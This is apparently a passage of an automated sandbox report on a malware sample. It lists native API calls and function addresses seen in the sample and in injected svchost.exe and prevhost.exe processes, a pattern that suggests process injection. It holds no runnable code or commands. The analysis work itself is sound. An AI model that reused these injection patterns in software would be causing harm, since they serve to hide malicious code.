                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AF0 NtWriteFile,2_2_02F72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AD0 NtReadFile,2_2_02F72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AB0 NtWaitForSingleObject,2_2_02F72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BF0 NtAllocateVirtualMemory,2_2_02F72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BE0 NtQueryValueKey,2_2_02F72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BA0 NtEnumerateValueKey,2_2_02F72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B80 NtQueryInformationFile,2_2_02F72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EE0 NtQueueApcThread,2_2_02F72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EA0 NtAdjustPrivilegesToken,2_2_02F72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E80 NtReadVirtualMemory,2_2_02F72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E30 NtWriteVirtualMemory,2_2_02F72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FE0 NtCreateFile,2_2_02F72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FB0 NtResumeThread,2_2_02F72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FA0 NtQuerySection,2_2_02F72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F90 NtProtectVirtualMemory,2_2_02F72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F60 NtCreateProcessEx,2_2_02F72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F30 NtCreateSection,2_2_02F72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CF0 NtOpenProcess,2_2_02F72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CC0 NtQueryVirtualMemory,2_2_02F72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CA0 NtQueryInformationToken,2_2_02F72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C60 NtCreateKey,2_2_02F72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C00 NtQueryInformationProcess,2_2_02F72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DD0 NtDelayExecution,2_2_02F72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DB0 NtEnumerateKey,2_2_02F72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D30 NtUnmapViewOfSection,2_2_02F72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D10 NtMapViewOfSection,2_2_02F72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D00 NtSetInformationFile,2_2_02F72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73090 NtSetValueKey,2_2_02F73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73010 NtOpenDirectoryObject,2_2_02F73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F739B0 NtGetContextThread,2_2_02F739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D70 NtOpenThread,2_2_02F73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D10 NtOpenProcessToken,2_2_02F73D10
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05124650 NtSuspendThread,LdrInitializeThunk,5_2_05124650
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05124340 NtSetContextThread,LdrInitializeThunk,5_2_05124340
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122D10 NtMapViewOfSection,LdrInitializeThunk,5_2_05122D10
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_05122D30
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122DD0 NtDelayExecution,LdrInitializeThunk,5_2_05122DD0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_05122DF0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_05122C70
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122C60 NtCreateKey,LdrInitializeThunk,5_2_05122C60
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_05122CA0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122F30 NtCreateSection,LdrInitializeThunk,5_2_05122F30
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122FB0 NtResumeThread,LdrInitializeThunk,5_2_05122FB0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122FE0 NtCreateFile,LdrInitializeThunk,5_2_05122FE0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_05122E80
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122EE0 NtQueueApcThread,LdrInitializeThunk,5_2_05122EE0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122B60 NtClose,LdrInitializeThunk,5_2_05122B60
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_05122BA0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_05122BF0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122BE0 NtQueryValueKey,LdrInitializeThunk,5_2_05122BE0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122AD0 NtReadFile,LdrInitializeThunk,5_2_05122AD0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122AF0 NtWriteFile,LdrInitializeThunk,5_2_05122AF0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051235C0 NtCreateMutant,LdrInitializeThunk,5_2_051235C0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051239B0 NtGetContextThread,LdrInitializeThunk,5_2_051239B0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122D00 NtSetInformationFile,5_2_05122D00
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122DB0 NtEnumerateKey,5_2_05122DB0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122C00 NtQueryInformationProcess,5_2_05122C00
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122CC0 NtQueryVirtualMemory,5_2_05122CC0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122CF0 NtOpenProcess,5_2_05122CF0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122F60 NtCreateProcessEx,5_2_05122F60
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122F90 NtProtectVirtualMemory,5_2_05122F90
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122FA0 NtQuerySection,5_2_05122FA0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122E30 NtWriteVirtualMemory,5_2_05122E30
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122EA0 NtAdjustPrivilegesToken,5_2_05122EA0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122B80 NtQueryInformationFile,5_2_05122B80
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05122AB0 NtWaitForSingleObject,5_2_05122AB0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05123010 NtOpenDirectoryObject,5_2_05123010
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05123090 NtSetValueKey,5_2_05123090
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05123D10 NtOpenProcessToken,5_2_05123D10
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05123D70 NtOpenThread,5_2_05123D70
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F793A0 NtCreateFile,5_2_02F793A0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F796A0 NtClose,5_2_02F796A0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F79600 NtDeleteFile,5_2_02F79600
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F79510 NtReadFile,5_2_02F79510
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_02F79800 NtAllocateVirtualMemory,5_2_02F79800
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0057D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0057D5EB
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00571201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00571201
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0057E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0057E8F6
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0051BF400_2_0051BF40
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005820460_2_00582046
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005180600_2_00518060
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005782980_2_00578298
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0054E4FF0_2_0054E4FF
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0054676B0_2_0054676B
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005A48730_2_005A4873
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0051CAF00_2_0051CAF0
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0053CAA00_2_0053CAA0
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0052CC390_2_0052CC39
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00546DD90_2_00546DD9
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0052B1190_2_0052B119
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005191C00_2_005191C0
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005313940_2_00531394
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005317060_2_00531706
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0053781B0_2_0053781B
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0052997D0_2_0052997D
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005179200_2_00517920
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005319B00_2_005319B0
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00537A4A0_2_00537A4A
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00531C770_2_00531C77
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00537CA70_2_00537CA7
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0059BE440_2_0059BE44
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00549EEE0_2_00549EEE
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00531F320_2_00531F32
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_016040700_2_01604070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F42832_2_024F4283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F8A832_2_024F8A83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F02632_2_024F0263
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0250F2132_2_0250F213
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E32A02_2_024E32A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E48442_2_024E4844
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E11C02_2_024E11C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E29A02_2_024E29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E11B52_2_024E11B5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024EE4632_2_024EE463
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F6C7E2_2_024F6C7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F6C832_2_024F6C83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024F04832_2_024F0483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024EE5A82_2_024EE5A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024EE5B32_2_024EE5B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC02C02_2_02FC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE02742_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030003E62_2_030003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F02_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA3522_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030001AA2_2_030001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD20002_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF81CC2_2_02FF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC81582_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA1182_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F301002_2_02F30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C6E02_2_02F5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C02_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F407702_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F647502_2_02F64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEE4F62_2_02FEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030005912_2_03000591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF24462_2_02FF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F405352_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA802_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF6BD72_2_02FF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB402_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E8F02_2_02F6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F268B82_2_02F268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300A9A62_2_0300A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4A8402_2_02F4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F428402_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A02_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F569622_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEEDB2_2_02FFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52E902_2_02F52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFCE932_2_02FFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40E592_2_02F40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEE262_2_02FFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4CFE02_2_02F4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32FC82_2_02F32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBEFA02_2_02FBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4F402_2_02FB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60F302_2_02F60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F82F282_2_02F82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30CF22_2_02F30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0CB52_2_02FE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40C002_2_02F40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3ADE02_2_02F3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F58DBF2_2_02F58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4AD002_2_02F4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE12ED2_2_02FE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B2C02_2_02F5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F452A02_2_02F452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F8739A2_2_02F8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D34C2_2_02F2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF132D2_2_02FF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF70E92_2_02FF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF0E02_2_02FFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF0CC2_2_02FEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F470C02_2_02F470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B16B2_2_0300B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4B1B02_2_02F4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F1722_2_02F2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7516C2_2_02F7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF16CC2_2_02FF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF7B02_2_02FFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F314602_2_02F31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF43F2_2_02FFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD5B02_2_02FDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF75712_2_02FF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEDAC62_2_02FEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDDAAC2_2_02FDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F85AA02_2_02F85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB3A6C2_2_02FB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFA492_2_02FFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7A462_2_02FF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB5BF02_2_02FB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7DBF92_2_02F7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FB802_2_02F5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFB762_2_02FFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F438E02_2_02F438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAD8002_2_02FAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F499502_2_02F49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B9502_2_02F5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD59102_2_02FD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F49EB02_2_02F49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFFB12_2_02FFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F41F922_2_02F41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFF092_2_02FFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFCF22_2_02FFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB9C322_2_02FB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FDC02_2_02F5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7D732_2_02FF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF1D5A2_2_02FF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43D402_2_02F43D40
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F05355_2_050F0535
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051B05915_2_051B0591
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051A24465_2_051A2446
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0519E4F65_2_0519E4F6
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051147505_2_05114750
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F07705_2_050F0770
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050EC7C05_2_050EC7C0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0510C6E05_2_0510C6E0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0518A1185_2_0518A118
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050E01005_2_050E0100
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051781585_2_05178158
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051B01AA5_2_051B01AA
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051A81CC5_2_051A81CC
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051820005_2_05182000
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AA3525_2_051AA352
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051B03E65_2_051B03E6
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050FE3F05_2_050FE3F0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051902745_2_05190274
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051702C05_2_051702C0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050FAD005_2_050FAD00
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05108DBF5_2_05108DBF
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050EADE05_2_050EADE0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F0C005_2_050F0C00
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05190CB55_2_05190CB5
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050E0CF25_2_050E0CF2
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05110F305_2_05110F30
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05132F285_2_05132F28
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05164F405_2_05164F40
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0516EFA05_2_0516EFA0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050E2FC85_2_050E2FC8
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050FCFE05_2_050FCFE0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AEE265_2_051AEE26
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F0E595_2_050F0E59
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_05102E905_2_05102E90
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051ACE935_2_051ACE93
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AEEDB5_2_051AEEDB
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051069625_2_05106962
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F29A05_2_050F29A0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051BA9A65_2_051BA9A6
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F28405_2_050F2840
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050FA8405_2_050FA840
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050D68B85_2_050D68B8
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0511E8F05_2_0511E8F0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AAB405_2_051AAB40
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051A6BD75_2_051A6BD7
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050EEA805_2_050EEA80
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051A75715_2_051A7571
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0518D5B05_2_0518D5B0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AF43F5_2_051AF43F
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050E14605_2_050E1460
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AF7B05_2_051AF7B0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051A16CC5_2_051A16CC
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051BB16B5_2_051BB16B
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0512516C5_2_0512516C
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050DF1725_2_050DF172
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050FB1B05_2_050FB1B0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F70C05_2_050F70C0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0519F0CC5_2_0519F0CC
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051A70E95_2_051A70E9
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051AF0E05_2_051AF0E0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051A132D5_2_051A132D
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050DD34C5_2_050DD34C
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0513739A5_2_0513739A
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F52A05_2_050F52A0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0510B2C05_2_0510B2C0
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051912ED5_2_051912ED
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051A1D5A5_2_051A1D5A
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_050F3D405_2_050F3D40
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_051A7D735_2_051A7D73
                Source: C:\Windows\SysWOW64\prevhost.exeCode function: 5_2_0510FDC05_2_0510FDC0
